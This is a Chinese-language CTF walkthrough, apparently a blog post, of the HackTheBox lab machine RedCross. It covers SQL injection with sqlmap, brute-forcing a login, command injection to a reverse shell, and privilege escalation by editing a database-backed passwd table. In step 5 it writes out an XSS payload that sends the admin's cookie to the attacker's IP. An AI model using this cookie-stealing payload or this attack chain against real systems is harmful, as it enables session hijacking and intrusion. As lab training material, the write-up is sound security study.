1.nmap探测发现22、80、443、端口开放。浏览器连接80端口会重定向到域名https://intra.redcross.htb/,将域名添加到/etc/hosts后可以看到网页。
2.暴力破解web登录页面,可以拿到一对登录凭据guest:guest,提交表单中的UserID,可以获取一个能够注入的url。
弱点url
3.sqlmap对url进行注入,可以从redcross数据库中拿到部分hash和提示,其中反复提到admin webapp,说明存在一处管理面板,subd说明是子域名。
redcrosss数据库
4.再次添加/etc/hosts/对应关系,10.10.10.113 <----> admin.redcross.htb,可以看到管理员界面,但是没有登录密码。
管理员界面
5.回到intra.redcross.htb,在contact页面发现留言板,会向后台提交数据,可能存在XSS,在email表单项中确认存在XSS,编写script脚本(<script>new Image().src='http://10.10.x.x/'+document.cookie</scr),并在本地监听回连,可以拿到管理员cookie。
cookie
6.登录后可以看到如下界面。
后台界面
7.在防火墙面板上添加自己的ip。
防火墙
8.在用户管理页面可以添加用户,系统会自动生成密码,该密码可以登录ssh,但获得的是受限shell并没有什么用。
添加用户
9.回到防火墙管理页面,在deny按钮发包处发现存在命令注入漏洞,可以直接拿到反弹shell。
反弹shell
10.在shell中翻看页面信息,可以拿到多个数据库连接串,包括mysql和psql。
db pass
11.登录psql发现,有四个表单,只有passwd_table表有访问权限,但这个表中保存了你刚在通过用户管理页面添加的用户帐户,gid,uid,group,帐户目录等关键信息。尝试update gid=0,group=0,目录为/root发现可以成功。登录后你能拿到相应权限但是无法sudo,应为你不在sudo组中。
更新权限
12.查看/etc/group发现sudo组id为27,再次更新用户gid为27,可以正常sudo命令权限为all,至此顺利拿下目标。
网友评论